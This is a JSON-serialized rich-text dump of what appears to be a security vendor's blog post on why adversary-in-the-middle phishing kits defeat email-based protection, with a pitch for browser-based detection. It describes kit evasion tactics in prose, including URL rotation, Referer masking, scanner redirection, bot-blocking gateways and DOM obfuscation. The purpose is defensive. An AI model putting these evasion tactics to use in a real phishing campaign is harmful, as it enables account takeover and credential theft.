ntent":128546},{},[128547,128550,128557],{"nodeType":173,"value":122071,"marks":128548,"data":128549},[],{},{"nodeType":186,"data":128551,"content":128552},{"uri":122076},[128553],{"nodeType":173,"value":122079,"marks":128554,"data":128556},[128555],{"type":194},{},{"nodeType":173,"value":122084,"marks":128558,"data":128559},[],{},{"nodeType":254,"data":128561,"content":128562},{},[128563],{"nodeType":178,"data":128564,"content":128565},{},[128566],{"nodeType":173,"value":122094,"marks":128567,"data":128568},[],{},{"nodeType":178,"data":128570,"content":128571},{},[128572],{"nodeType":173,"value":122101,"marks":128573,"data":128574},[],{},{"nodeType":235,"data":128576,"content":128577},{},[128578],{"nodeType":173,"value":122108,"marks":128579,"data":128581},[128580],{"type":370},{},{"nodeType":178,"data":128583,"content":128584},{},[128585,128588,128594],{"nodeType":173,"value":122116,"marks":128586,"data":128587},[],{},{"nodeType":186,"data":128589,"content":128590},{"uri":122121},[128591],{"nodeType":173,"value":122124,"marks":128592,"data":128593},[],{},{"nodeType":173,"value":122128,"marks":128595,"data":128596},[],{},{"nodeType":312,"data":128598,"content":128601},{"target":128599},{"sys":128600},{"id":122135,"type":317,"linkType":318},[],{"nodeType":178,"data":128603,"content":128604},{},[128605],{"nodeType":173,"value":122141,"marks":128606,"data":128607},[],{},{"nodeType":178,"data":128609,"content":128610},{},[128611],{"nodeType":173,"value":122148,"marks":128612,"data":128613},[],{},{"nodeType":312,"data":128615,"content":128618},{"target":128616},{"sys":128617},{"id":122155,"type":317,"linkType":318},[],{"nodeType":178,"data":128620,"content":128621},{},[128622],{"nodeType":173,"value":122161,"marks":128623,"data":128624},[],{},{"nodeType":312,"data":128626,"content":128629},{"target":128627},{"sys":128628},{"id":122168,"type":317,"linkType":318},[],{"nodeType":235,"data":128631,"content":128632},{},[128633],{"nodeType":173,"value":122174,"marks":128634,"data":128636},[128635],{"type":370},{},{"nodeType":178,"data":128638,"content":128639},{},[128640],{"nodeType":173,"value":122182,"marks":128641,"data":128642},[],{},{"nodeType":312,"data":128644,"content":128647},{"target":128645},{"sys":128646},{"id":122189,"type":317,"linkType":318},[],{"nodeType":312,"data":128649,"content":128652},{"target":128650},{"sys":128651},{"id":122195,"type":317,"linkType":318},[],{"nodeType":178,"data":128654,"content":128655},{},[128656],{"nodeType":173,"value":122201,"marks":128657,"data":128658},[],{},{"nodeType":231,"data":128660,"content":128661},{},[],{"nodeType":169,"data":128663,"content":128664},{},[128665],{"nodeType":173,"value":16139,"marks":128666,"data":128668},[128667],{"type":370},{},{"nodeType":178,"data":128670,"content":128671},{},[128672,128675,128682,128685,128692],{"nodeType":173,"value":122218,"marks":128673,"data":128674},[],{},{"nodeType":186,"data":128676,"content":128677},{"uri":88239},[128678],{"nodeType":173,"value":88245,"marks":128679,"data":128681},[128680],{"type":194},{},{"nodeType":173,"value":933,"marks":128683,"data":128684},[],{},{"nodeType":186,"data":128686,"content":128687},{"uri":122233},[128688],{"nodeType":173,"value":122236,"marks":128689,"data":128691},[128690],{"type":194},{},{"nodeType":173,"value":122241,"marks":128693,"data":128694},[],{},{"nodeType":178,"data":128696,"content":128697},{},[128698],{"nodeType":173,"value":122248,"marks":128699,"data":128700},[],{},{"nodeType":178,"data":128702,"content":128703},{},[128704,128707,128714],{"nodeType":173,"value":122255,"marks":128705,"data":128706},[],{},{"nodeType":186,"data":128708,"content":128709},{"uri":81621},[128710],{"nodeType":173,"value":122262,"marks":128711,"data":128713},[128712],{"type":194},{},{"nodeType":173,"value":122267,"marks":128715,"data":128716},[],{},{"nodeType":178,"data":128718,"content":128719},{},[128720],{"nodeType":173,"value":122274,"marks":128721,"data":128722},[],{},{"nodeType":3769,"data":128724,"content":128725},{},[128726],{"nodeType":178,"data":128727,"content":128728},{},[128729],{"nodeType":173,"value":122284,"marks":128730,"data":128732},[128731],{"type":370},{},{"nodeType":178,"data":128734,"content":128735},{},[128736],{"nodeType":173,"value":122292,"marks":128737,"data":128738},[],{},{"nodeType":231,"data":128740,"content":128741},{},[],{"nodeType":169,"data":128743,"content":128744},{},[128745],{"nodeType":173,"value":1422,"marks":128746,"data":128748},[128747],{"type":370},{},{"nodeType":178,"data":128750,"content":128751},{},[128752,128755,128762],{"nodeType":173,"value":122309,"marks":128753,"data":128754},[],{},{"nodeType":186,"data":128756,"content":128757},{"uri":122314},[128758],{"nodeType":173,"value":122317,"marks":128759,"data":128761},[128760],{"type":194},{},{"nodeType":173,"value":197,"marks":128763,"data":128764},[],{},{"nodeType":178,"data":128766,"content":128767},{},[128768,128771,128778],{"nodeType":173,"value":122328,"marks":128769,"data":128770},[],{},{"nodeType":186,"data":128772,"content":128773},{"uri":473},[128774],{"nodeType":173,"value":2889,"marks":128775,"data":128777},[128776],{"type":194},{},{"nodeType":173,"value":1477,"marks":128779,"data":128780},[],{},{"items":128782},[128783,128785],{"sys":128784,"name":505},{"id":504},{"sys":128786,"name":509},{"id":508},{"items":128788},[128789],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":128790},{"url":1496},{"__typename":1528,"sys":128792,"content":128794,"title":129406,"synopsis":129407,"hashTags":118,"publishedDate":129408,"slug":129409,"tagsCollection":129410,"authorsCollection":129416},{"id":128793},"4UgGUvlZNqkJtx9nNprKg0",{"json":128795},{"nodeType":165,"data":128796,"content":128797},{},[128798,128805,128835,128841,128848,128851,128859,128866,128873,128906,128913,128920,128927,128930,128938,128957,128964,128971,128977,128984,128991,128994,129002,129009,129016,129021,129028,129048,129081,129088,129091,129099,129106,129113,129119,129125,129132,129139,129144,129151,129157,129164,129167,129175,129182,129189,129192,129200,129207,129214,129221,129224,129232,129239,129246,129253,129260,129267,129272,129279,129286,129291,129298,129330,129336,129348,129368,129374,129377,129384,129390],{"nodeType":178,"data":128799,"content":128800},{},[128801],{"nodeType":173,"value":128802,"marks":128803,"data":128804},"Most organizations today have invested in an email security solution of some description. But even the most premium tools have significant limitations when it comes to modern phishing attacks. ",[],{},{"nodeType":178,"data":128806,"content":128807},{},[128808,128812,128819,128823,128832],{"nodeType":173,"value":128809,"marks":128810,"data":128811},"The data speaks for itself — phishing remains as big a problem as it ever was (if not bigger!) despite enormous investment in security products and training. In 2024, identity-based attack vectors involving a human element (phishing and stolen credentials) accounted for 80% of the initial access observed by ",[],{},{"nodeType":186,"data":128813,"content":128814},{"uri":125982},[128815],{"nodeType":173,"value":1300,"marks":128816,"data":128818},[128817],{"type":194},{},{"nodeType":173,"value":128820,"marks":128821,"data":128822},", while 69% of organizations experienced a phishing incident in 2024 according to ",[],{},{"nodeType":186,"data":128824,"content":128826},{"uri":128825},"https://www.idsalliance.org/white-paper/2024-trends-in-securing-digital-identities/",[128827],{"nodeType":173,"value":128828,"marks":128829,"data":128831},"IDSA",[128830],{"type":194},{},{"nodeType":173,"value":197,"marks":128833,"data":128834},[],{},{"nodeType":312,"data":128836,"content":128840},{"target":128837},{"sys":128838},{"id":128839,"type":317,"linkType":318},"4urh9lIuo0ePgVIJZNtP2B",[],{"nodeType":178,"data":128842,"content":128843},{},[128844],{"nodeType":173,"value":128845,"marks":128846,"data":128847},"So, why are phishing attacks still so effective for attackers? ",[],{},{"nodeType":231,"data":128849,"content":128850},{},[],{"nodeType":169,"data":128852,"content":128853},{},[128854],{"nodeType":173,"value":128855,"marks":128856,"data":128858},"Modern phishing attacks are evading established controls",[128857],{"type":370},{},{"nodeType":178,"data":128860,"content":128861},{},[128862],{"nodeType":173,"value":128863,"marks":128864,"data":128865},"Let’s start with the lay of the land: What controls and capabilities do organizations typically rely on when it comes to blocking credential phishing?  ",[],{},{"nodeType":178,"data":128867,"content":128868},{},[128869],{"nodeType":173,"value":128870,"marks":128871,"data":128872},"If you’re using an email security solution, you’re relying on the following core capabilities when it comes to detecting malicious phishing pages:",[],{},{"nodeType":250,"data":128874,"content":128875},{},[128876,128891],{"nodeType":254,"data":128877,"content":128878},{},[128879],{"nodeType":178,"data":128880,"content":128881},{},[128882,128887],{"nodeType":173,"value":128883,"marks":128884,"data":128886},"Known-bad blocklists:",[128885],{"type":370},{},{"nodeType":173,"value":128888,"marks":128889,"data":128890}," Block users from accessing known-bad or unapproved domains/URLs, and block traffic from known-bad malicious IPs, using Threat Intelligence (TI) feeds.",[],{},{"nodeType":254,"data":128892,"content":128893},{},[128894],{"nodeType":178,"data":128895,"content":128896},{},[128897,128902],{"nodeType":173,"value":128898,"marks":128899,"data":128901},"Malicious webpage detection:",[128900],{"type":370},{},{"nodeType":173,"value":128903,"marks":128904,"data":128905}," Inspect webpages by loading them in a sandbox to detect malicious elements.",[],{},{"nodeType":178,"data":128907,"content":128908},{},[128909],{"nodeType":173,"value":128910,"marks":128911,"data":128912},"This also applies to other solutions that rely on these capabilities, such as web-based content filtering (e.g. Google Safe Browsing), CASB, SASE, SWG, etc. ",[],{},{"nodeType":178,"data":128914,"content":128915},{},[128916],{"nodeType":173,"value":128917,"marks":128918,"data":128919},"But, attackers are now using specific tactics, techniques, procedures (TTPs) and tooling designed to defeat these solutions. ",[],{},{"nodeType":178,"data":128921,"content":128922},{},[128923],{"nodeType":173,"value":128924,"marks":128925,"data":128926},"Let’s look at where these controls are falling short. ",[],{},{"nodeType":231,"data":128928,"content":128929},{},[],{"nodeType":169,"data":128931,"content":128932},{},[128933],{"nodeType":173,"value":128934,"marks":128935,"data":128937},"Attackers are innovating with new tooling and techniques",[128936],{"type":370},{},{"nodeType":178,"data":128939,"content":128940},{},[128941,128945,128954],{"nodeType":173,"value":128942,"marks":128943,"data":128944},"The vast majority of phishing attacks today are executed using ",[],{},{"nodeType":186,"data":128946,"content":128948},{"uri":128947},"https://pushsecurity.com/blog/phishing-2-0-how-phishing-toolkits-are-evolving-with-aitm/?utm_campaign=9983377-FY25Q1_Bleeping-Computer-Organic-Article&utm_source=bleepingcomputer&utm_medium=sponsored-content&utm_content=organic%20article",[128949],{"nodeType":173,"value":128950,"marks":128951,"data":128953},"AitM phishing kits — otherwise known as “MFA bypass” kits",[128952],{"type":194},{},{"nodeType":173,"value":1477,"marks":128955,"data":128956},[],{},{"nodeType":178,"data":128958,"content":128959},{},[128960],{"nodeType":173,"value":128961,"marks":128962,"data":128963},"These kits use dedicated tooling to act as a proxy between the target and a legitimate login portal for an application. This allows the target to log in successfully with a legitimate service they use and even continue to interact with it. ",[],{},{"nodeType":178,"data":128965,"content":128966},{},[128967],{"nodeType":173,"value":128968,"marks":128969,"data":128970},"As it’s a proxy to the real application, the page will appear exactly as the user expects, because they are logging into the legitimate site – just taking a detour via the attacker’s device. However, because the attacker is sitting in the middle of this connection, they are able to observe all interactions, intercept authentication material like credentials, MFA codes, and session tokens to take control of the authenticated session and gain control of the user account. ",[],{},{"nodeType":312,"data":128972,"content":128976},{"target":128973},{"sys":128974},{"id":128975,"type":317,"linkType":318},"3ZAawfzPVfhb8cmvWNZEVK",[],{"nodeType":178,"data":128978,"content":128979},{},[128980],{"nodeType":173,"value":128981,"marks":128982,"data":128983},"MFA was once widely regarded as the silver bullet for phishing (we all remember the Microsoft stat “MFA prevents over 99% of identity-based attacks”) but this is no longer the case. ",[],{},{"nodeType":178,"data":128985,"content":128986},{},[128987],{"nodeType":173,"value":128988,"marks":128989,"data":128990},"Not only are these kits incredibly effective at bypassing other anti-phishing controls like MFA, attackers are building them specifically to evade common detection tooling and techniques. ",[],{},{"nodeType":231,"data":128992,"content":128993},{},[],{"nodeType":235,"data":128995,"content":128996},{},[128997],{"nodeType":173,"value":128998,"marks":128999,"data":129001},"Known-bad blocklists can’t keep up",[129000],{"type":370},{},{"nodeType":178,"data":129003,"content":129004},{},[129005],{"nodeType":173,"value":129006,"marks":129007,"data":129008},"The fundamental limitation with known-bad blocklists is that they focus on indicators that are easy for attackers to change, in turn making detections based on them easy to bypass. ",[],{},{"nodeType":178,"data":129010,"content":129011},{},[129012],{"nodeType":173,"value":129013,"marks":129014,"data":129015},"Attackers have gotten pretty good at disguising and rotating these elements. In modern phishing attacks, every target can receive a unique email and link. Even just using a URL shortener can bypass this. It’s equivalent to a malware hash – trivial to change, and therefore not a great thing to pin your detections on. The kind of detection that sits right at the bottom of the Pyramid of Pain. ",[],{},{"nodeType":312,"data":129017,"content":129020},{"target":129018},{"sys":129019},{"id":74541,"type":317,"linkType":318},[],{"nodeType":178,"data":129022,"content":129023},{},[129024],{"nodeType":173,"value":129025,"marks":129026,"data":129027},"You could look at which IP address the user connects to, but these days it’s very simple for attackers to add a new IP to their cloud-hosted server. If a domain is flagged as known-bad, the attacker only has to register a new domain, or compromise a WordPress server on an already trusted domain. Both of these things are happening on a massive scale as attackers pre-plan for the fact that their domains will be burned at some point. Attackers are more than happy to spend $10-$20 per new domain in the grand scheme of the potential proceeds of crime. ",[],{},{"nodeType":178,"data":129029,"content":129030},{},[129031,129035,129044],{"nodeType":173,"value":129032,"marks":129033,"data":129034},"For example, ",[],{},{"nodeType":186,"data":129036,"content":129038},{"uri":129037},"https://pushsecurity.com/blog/how-aitm-phishing-kits-evade-detection/?utm_campaign=9983377-FY25Q1_Bleeping-Computer-Organic-Article&utm_source=bleepingcomputer&utm_medium=sponsored-content&utm_content=organic%20article",[129039],{"nodeType":173,"value":129040,"marks":129041,"data":129043},"recent examples of Adversary-in-the-Middle phishing kits",[129042],{"type":194},{},{"nodeType":173,"value":129045,"marks":129046,"data":129047}," including Tycoon, Nakedpages, Evilginx were seen to rotate the URLs they resolve to (from a continually refreshed pool of URLs), mask the HTTP Referer header to disguise suspicious redirects, and redirect to benign (legitimate) domains if anyone but the intended victims attempted to visit the page. ",[],{},{"nodeType":178,"data":129049,"content":129050},{},[129051,129055,129064,129068,129077],{"nodeType":173,"value":129052,"marks":129053,"data":129054},"And in many cases, attackers are ",[],{},{"nodeType":186,"data":129056,"content":129058},{"uri":129057},"https://www.bleepingcomputer.com/news/security/campaign-abusing-hubspot-targets-20-000-microsoft-azure-accounts/",[129059],{"nodeType":173,"value":129060,"marks":129061,"data":129063},"leveraging legitimate SaaS services",[129062],{"type":194},{},{"nodeType":173,"value":129065,"marks":129066,"data":129067}," to conduct their campaigns (",[],{},{"nodeType":186,"data":129069,"content":129071},{"uri":129070},"https://www.bleepingcomputer.com/news/security/proofpoint-settings-exploited-to-send-millions-of-phishing-emails-daily/",[129072],{"nodeType":173,"value":129073,"marks":129074,"data":129076},"sometimes even using email protection services themselves!",[129075],{"type":194},{},{"nodeType":173,"value":129078,"marks":129079,"data":129080},") making it even harder to filter genuine from harmful links. ",[],{},{"nodeType":178,"data":129082,"content":129083},{},[129084],{"nodeType":173,"value":129085,"marks":129086,"data":129087},"But there’s a bigger issue here – for defenders to know that a URL, IP, or domain name is bad, it needs to be reported first. When are things reported? Typically after being used in an attack — so unfortunately, someone always gets hurt. ",[],{},{"nodeType":231,"data":129089,"content":129090},{},[],{"nodeType":235,"data":129092,"content":129093},{},[129094],{"nodeType":173,"value":129095,"marks":129096,"data":129098},"Malicious webpage detections are failing",[129097],{"type":370},{},{"nodeType":178,"data":129100,"content":129101},{},[129102],{"nodeType":173,"value":129103,"marks":129104,"data":129105},"Attackers are using various tricks to prevent security tools and bots from reaching their phishing pages to analyse them. ",[],{},{"nodeType":178,"data":129107,"content":129108},{},[129109],{"nodeType":173,"value":129110,"marks":129111,"data":129112},"Using legitimate services to host their domains is increasingly common, with services like Cloudflare Workers used for the initial gateway, and Cloudflare Turnstile to prevent security bots from advancing to the page. ",[],{},{"nodeType":312,"data":129114,"content":129118},{"target":129115},{"sys":129116},{"id":129117,"type":317,"linkType":318},"4XNxLbiZf3xUK1WeFDjjxl",[],{"nodeType":178,"data":129120,"content":129121},{},[129122],{"nodeType":173,"value":125165,"marks":129123,"data":129124},[],{},{"nodeType":178,"data":129126,"content":129127},{},[129128],{"nodeType":173,"value":129129,"marks":129130,"data":129131},"And if all this wasn’t enough, they’re also obfuscating both visual and DOM elements to prevent signature-based detections from picking them up — so even if you can land on the page, there’s a high chance that your detections won’t trigger. ",[],{},{"nodeType":178,"data":129133,"content":129134},{},[129135],{"nodeType":173,"value":129136,"marks":129137,"data":129138},"By changing the DOM structure, attackers are loading functionally equivalent pages that look very different under the hood.",[],{},{"nodeType":312,"data":129140,"content":129143},{"target":129141},{"sys":129142},{"id":107007,"type":317,"linkType":318},[],{"nodeType":178,"data":129145,"content":129146},{},[129147],{"nodeType":173,"value":129148,"marks":129149,"data":129150},"They’re also randomizing page titles, dynamically decoding text, changing the size and name of image elements, using different favicons, blurring backgrounds, substituting logos, and more… all to defeat common detections. ",[],{},{"nodeType":312,"data":129152,"content":129156},{"target":129153},{"sys":129154},{"id":129155,"type":317,"linkType":318},"3hlzM3qIqaZHy3qxtnRS5x",[],{"nodeType":178,"data":129158,"content":129159},{},[129160],{"nodeType":173,"value":129161,"marks":129162,"data":129163},"With all this, it’s no surprise that defenders can’t keep up. ",[],{},{"nodeType":231,"data":129165,"content":129166},{},[],{"nodeType":169,"data":129168,"content":129169},{},[129170],{"nodeType":173,"value":129171,"marks":129172,"data":129174},"The verdict",[129173],{"type":370},{},{"nodeType":178,"data":129176,"content":129177},{},[129178],{"nodeType":173,"value":129179,"marks":129180,"data":129181},"Historically, the industry has seen email security solutions and anti-phishing as the same thing. But it’s clear that email-based phishing protection isn’t really cutting it when it comes to modern credential phishing attacks (the most common and impactful phishing variant today). ",[],{},{"nodeType":178,"data":129183,"content":129184},{},[129185],{"nodeType":173,"value":129186,"marks":129187,"data":129188},"This isn’t to say that email-based solutions have no value — far from it. But relying on email scanners to detect phishing pages as a single line of defense isn’t enough anymore. ",[],{},{"nodeType":231,"data":129190,"content":129191},{},[],{"nodeType":169,"data":129193,"content":129194},{},[129195],{"nodeType":173,"value":129196,"marks":129197,"data":129199},"Building better phishing controls",[129198],{"type":370},{},{"nodeType":178,"data":129201,"content":129202},{},[129203],{"nodeType":173,"value":129204,"marks":129205,"data":129206},"The key to solving this problem is, put simply, building better controls. But to do this, we need to move away from email as being the primary (or often the only) place where phishing attacks can be stopped. ",[],{},{"nodeType":178,"data":129208,"content":129209},{},[129210],{"nodeType":173,"value":129211,"marks":129212,"data":129213},"While email is the main delivery vector for phishing attacks (at least, according to the data we have, which comes primarily from email security solutions) it’s not the only one. Phishing links are increasingly delivered to victims over IM platforms, social media — and generally over the internet. ",[],{},{"nodeType":178,"data":129215,"content":129216},{},[129217],{"nodeType":173,"value":129218,"marks":129219,"data":129220},"A better solution to the problem would therefore be able to follow the user across the sites they use, and see the actual phishing pages as the user sees them, as opposed to a sandbox (which, as we’ve discussed, attackers are well prepared for). ",[],{},{"nodeType":231,"data":129222,"content":129223},{},[],{"nodeType":235,"data":129225,"content":129226},{},[129227],{"nodeType":173,"value":129228,"marks":129229,"data":129231},"Is browser-based phishing protection the solution?",[129230],{"type":370},{},{"nodeType":178,"data":129233,"content":129234},{},[129235],{"nodeType":173,"value":129236,"marks":129237,"data":129238},"While we’ve been conditioned to think about phishing as something that happens over email, it’s actually the browser where most of the action happens, regardless of the initial delivery channel.",[],{},{"nodeType":178,"data":129240,"content":129241},{},[129242],{"nodeType":173,"value":129243,"marks":129244,"data":129245},"And while it’s tempting to view the delivery of a phishing link as the attack itself, the phish can’t succeed unless the victim enters their genuine credentials on the malicious page. ",[],{},{"nodeType":178,"data":129247,"content":129248},{},[129249],{"nodeType":173,"value":129250,"marks":129251,"data":129252},"Push provides a browser-based identity security solution that stops phishing attacks where they happen — in employee browsers. ",[],{},{"nodeType":178,"data":129254,"content":129255},{},[129256],{"nodeType":173,"value":129257,"marks":129258,"data":129259},"Being in the browser delivers a lot of advantages when it comes to detecting and intercepting phishing attacks. You see the live webpage that the user sees, meaning you have much better visibility of malicious elements running on the page. It also means that you can implement real-time controls that kick in when a malicious element is detected. ",[],{},{"nodeType":178,"data":129261,"content":129262},{},[129263],{"nodeType":173,"value":129264,"marks":129265,"data":129266},"There’s a clear difference when you compare a phishing attack with and without Push. ",[],{},{"nodeType":312,"data":129268,"content":129271},{"target":129269},{"sys":129270},{"id":380,"type":317,"linkType":318},[],{"nodeType":178,"data":129273,"content":129274},{},[129275],{"nodeType":173,"value":129276,"marks":129277,"data":129278},"Here, an attacker hacks a WordPress blog to get a reputable domain and then runs a phishing toolkit on the webpage. They email one of your employees a link to it. Your SWG or email scanning solution inspects it in a sandbox but the phish kit detects this and redirects to a benign site so that it passes the inspection. ",[],{},{"nodeType":178,"data":129280,"content":129281},{},[129282],{"nodeType":173,"value":129283,"marks":129284,"data":129285},"Your user gets the email with the link and is now free to interact with the phishing page. They enter their credentials plus MFA code into the page and voila! The attacker steals the authenticated session and takes over the user’s account.  ",[],{},{"nodeType":312,"data":129287,"content":129290},{"target":129288},{"sys":129289},{"id":417,"type":317,"linkType":318},[],{"nodeType":178,"data":129292,"content":129293},{},[129294],{"nodeType":173,"value":129295,"marks":129296,"data":129297},"But with Push, our browser extension inspects the webpage running in the user's browser. Push observes that the webpage is a login page and the user is entering their password into the page, detecting that:",[],{},{"nodeType":250,"data":129299,"content":129300},{},[129301,129311,129321],{"nodeType":254,"data":129302,"content":129303},{},[129304],{"nodeType":178,"data":129305,"content":129306},{},[129307],{"nodeType":173,"value":129308,"marks":129309,"data":129310},"The password the user is entering matches the domain that password is pinned to. Since it doesn't match, based on this detection alone the user is automatically redirected to a blocking page. ",[],{},{"nodeType":254,"data":129312,"content":129313},{},[129314],{"nodeType":178,"data":129315,"content":129316},{},[129317],{"nodeType":173,"value":129318,"marks":129319,"data":129320},"The rendered web app is using a cloned app login page.",[],{},{"nodeType":254,"data":129322,"content":129323},{},[129324],{"nodeType":178,"data":129325,"content":129326},{},[129327],{"nodeType":173,"value":98253,"marks":129328,"data":129329},[],{},{"nodeType":178,"data":129331,"content":129332},{},[129333],{"nodeType":173,"value":98260,"marks":129334,"data":129335},[],{},{"nodeType":178,"data":129337,"content":129338},{},[129339,129343],{"nodeType":173,"value":129340,"marks":129341,"data":129342},"These are good examples of detections that are difficult (or impossible) for an attacker to evade — ",[],{},{"nodeType":173,"value":129344,"marks":129345,"data":129347},"you can’t phish a victim if they can’t enter their credentials into your phishing site! ",[129346],{"type":370},{},{"nodeType":178,"data":129349,"content":129350},{},[129351,129355,129364],{"nodeType":173,"value":129352,"marks":129353,"data":129354},"If we look at the Pyramid of Pain again, we can see that these are much harder detections for attackers to get around, ",[],{},{"nodeType":186,"data":129356,"content":129358},{"uri":129357},"https://pushsecurity.com/blog/shifting-detection-left-for-more-effective-itdr/?utm_campaign=9983377-FY25Q1_Bleeping-Computer-Organic-Article&utm_source=bleepingcomputer&utm_medium=sponsored-content&utm_content=organic%20article",[129359],{"nodeType":173,"value":129360,"marks":129361,"data":129363},"enabling earlier detection and interception of account takeover ",[129362],{"type":194},{},{"nodeType":173,"value":129365,"marks":129366,"data":129367},"when compared to static, TI-driven blocklists — stopping attacks before anyone gets hurt.",[],{},{"nodeType":312,"data":129369,"content":129373},{"target":129370},{"sys":129371},{"id":129372,"type":317,"linkType":318},"6q8H7vA8k7mLrSsr5R0TZ1",[],{"nodeType":231,"data":129375,"content":129376},{},[],{"nodeType":169,"data":129378,"content":129379},{},[129380],{"nodeType":173,"value":461,"marks":129381,"data":129383},[129382],{"type":370},{},{"nodeType":178,"data":129385,"content":129386},{},[129387],{"nodeType":173,"value":98309,"marks":129388,"data":129389},[],{},{"nodeType":178,"data":129391,"content":129392},{},[129393,129396,129403],{"nodeType":173,"value":61741,"marks":129394,"data":129395},[],{},{"nodeType":186,"data":129397,"content":129398},{"uri":77659},[129399],{"nodeType":173,"value":476,"marks":129400,"data":129402},[129401],{"type":194},{},{"nodeType":173,"value":77665,"marks":129404,"data":129405},[],{},"Why it's time for phishing prevention to move beyond email","Modern MFA-bypass phishing attacks are routinely defeating primarily email-based security controls. Why are controls failing and what can we do about it? ","2025-03-20T00:00:00.000Z","why-its-time-for-phishing-prevention-to-move-beyond-email",{"items":129411},[129412,129414],{"sys":129413,"name":505},{"id":504},{"sys":129415,"name":509},{"id":508},{"items":129417},[129418],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":129419},{"url":1496},{"items":129421},[129422],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":129423},{"url":8615},{"json":129425,"links":129830},{"nodeType":165,"data":129426,"content":129427},{},[129428,129435,129441,129447,129452,129458,129463,129469,129475,129478,129485,129491,129497,129518,129524,129527,129534,129547,129552,129558,129563,129569,129575,129578,129585,129601,129606,129612,129617,129620,129627,129643,129648,129654,129659,129675,129680,129685,129688,129695,129701,129707,129712,129715,129722,129728,129734,129737,129744,129750,129756,129761,129767,129797,129802,129809,129815],{"nodeType":169,"data":129429,"content":129430},{},[129431],{"nodeType":173,"value":24096,"marks":129432,"data":129434},[129433],{"type":370},{},{"nodeType":178,"data":129436,"content":129437},{},[129438],{"nodeType":173,"value":69310,"marks":129439,"data":129440},[],{},{"nodeType":178,"data":129442,"content":129443},{},[129444],{"nodeType":173,"value":69317,"marks":129445,"data":129446},[],{},{"nodeType":312,"data":129448,"content":129451},{"target":129449},{"sys":129450},{"id":63196,"type":317,"linkType":318},[],{"nodeType":178,"data":129453,"content":129454},{},[129455],{"nodeType":173,"value":69329,"marks":129456,"data":129457},[],{},{"nodeType":312,"data":129459,"content":129462},{"target":129460},{"sys":129461},{"id":69336,"type":317,"linkType":318},[],{"nodeType":178,"data":129464,"content":129465},{},[129466],{"nodeType":173,"value":69342,"marks":129467,"data":129468},[],{},{"nodeType":178,"data":129470,"content":129471},{},[129472],{"nodeType":173,"value":69349,"marks":129473,"data":129474},[],{},{"nodeType":231,"data":129476,"content":129477},{},[],{"nodeType":169,"data":129479,"content":129480},{},[129481],{"nodeType":173,"value":69359,"marks":129482,"data":129484},[129483],{"type":370},{},{"nodeType":178,"data":129486,"content":129487},{},[129488],{"nodeType":173,"value":69367,"marks":129489,"data":129490},[],{},{"nodeType":178,"data":129492,"content":129493},{},[129494],{"nodeType":173,"value":69374,"marks":129495,"data":129496},[],{},{"nodeType":250,"data":129498,"content":129499},{},[129500,129509],{"nodeType":254,"data":129501,"content":129502},{},[129503],{"nodeType":178,"data":129504,"content":129505},{},[129506],{"nodeType":173,"value":69387,"marks":129507,"data":129508},[],{},{"nodeType":254,"data":129510,"content":129511},{},[129512],{"nodeType":178,"data":129513,"content":129514},{},[129515],{"nodeType":173,"value":69397,"marks":129516,"data":129517},[],{},{"nodeType":178,"data":129519,"content":129520},{},[129521],{"nodeType":173,"value":69404,"marks":129522,"data":129523},[],{},{"nodeType":231,"data":129525,"content":129526},{},[],{"nodeType":169,"data":129528,"content":129529},{},[129530],{"nodeType":173,"value":69414,"marks":129531,"data":129533},[129532],{"type":370},{},{"nodeType":178,"data":129535,"content":129536},{},[129537,129540,129544],{"nodeType":173,"value":69422,"marks":129538,"data":129539},[],{},{"nodeType":173,"value":8046,"marks":129541,"data":129543},[129542],{"type":370},{},{"nodeType":173,"value":69430,"marks":129545,"data":129546},[],{},{"nodeType":312,"data":129548,"content":129551},{"target":129549},{"sys":129550},{"id":69437,"type":317,"linkType":318},[],{"nodeType":178,"data":129553,"content":129554},{},[129555],{"nodeType":173,"value":69443,"marks":129556,"data":129557},[],{},{"nodeType":312,"data":129559,"content":129562},{"target":129560},{"sys":129561},{"id":69450,"type":317,"linkType":318},[],{"nodeType":178,"data":129564,"content":129565},{},[129566],{"nodeType":173,"value":69456,"marks":129567,"data":129568},[],{},{"nodeType":178,"data":129570,"content":129571},{},[129572],{"nodeType":173,"value":69463,"marks":129573,"data":129574},[],{},{"nodeType":231,"data":129576,"content":129577},{},[],{"nodeType":235,"data":129579,"content":129580},{},[129581],{"nodeType":173,"value":69473,"marks":129582,"data":129584},[129583],{"type":370},{},{"nodeType":178,"data":129586,"content":129587},{},[129588,129591,129598],{"nodeType":173,"value":69481,"marks":129589,"data":129590},[],{},{"nodeType":186,"data":129592,"content":129593},{"uri":61655},[129594],{"nodeType":173,"value":69488,"marks":129595,"data":129597},[129596],{"type":194},{},{"nodeType":173,"value":69493,"marks":129599,"data":129600},[],{},{"nodeType":312,"data":129602,"content":129605},{"target":129603},{"sys":129604},{"id":69500,"type":317,"linkType":318},[],{"nodeType":178,"data":129607,"content":129608},{},[129609],{"nodeType":173,"value":69506,"marks":129610,"data":129611},[],{},{"nodeType":312,"data":129613,"content":129616},{"target":129614},{"sys":129615},{"id":69513,"type":317,"linkType":318},[],{"nodeType":231,"data":129618,"content":129619},{},[],{"nodeType":169,"data":129621,"content":129622},{},[129623],{"nodeType":173,"value":69522,"marks":129624,"data":129626},[129625],{"type":370},{},{"nodeType":178,"data":129628,"content":129629},{},[129630,129633,129640],{"nodeType":173,"value":69530,"marks":129631,"data":129632},[],{},{"nodeType":186,"data":129634,"content":129635},{"uri":69535},[129636],{"nodeType":173,"value":69538,"marks":129637,"data":129639},[129638],{"type":194},{},{"nodeType":173,"value":69543,"marks":129641,"data":129642},[],{},{"nodeType":312,"data":129644,"content":129647},{"target":129645},{"sys":129646},{"id":69550,"type":317,"linkType":318},[],{"nodeType":178,"data":129649,"content":129650},{},[129651],{"nodeType":173,"value":69556,"marks":129652,"data":129653},[],{},{"nodeType":312,"data":129655,"content":129658},{"target":129656},{"sys":129657},{"id":69563,"type":317,"linkType":318},[],{"nodeType":178,"data":129660,"content":129661},{},[129662,129665,129672],{"nodeType":173,"value":69569,"marks":129663,"data":129664},[],{},{"nodeType":186,"data":129666,"content":129667},{"uri":69574},[129668],{"nodeType":173,"value":69577,"marks":129669,"data":129671},[129670],{"type":194},{},{"nodeType":173,"value":69582,"marks":129673,"data":129674},[],{},{"nodeType":312,"data":129676,"content":129679},{"target":129677},{"sys":129678},{"id":69589,"type":317,"linkType":318},[],{"nodeType":312,"data":129681,"content":129684},{"target":129682},{"sys":129683},{"id":69595,"type":317,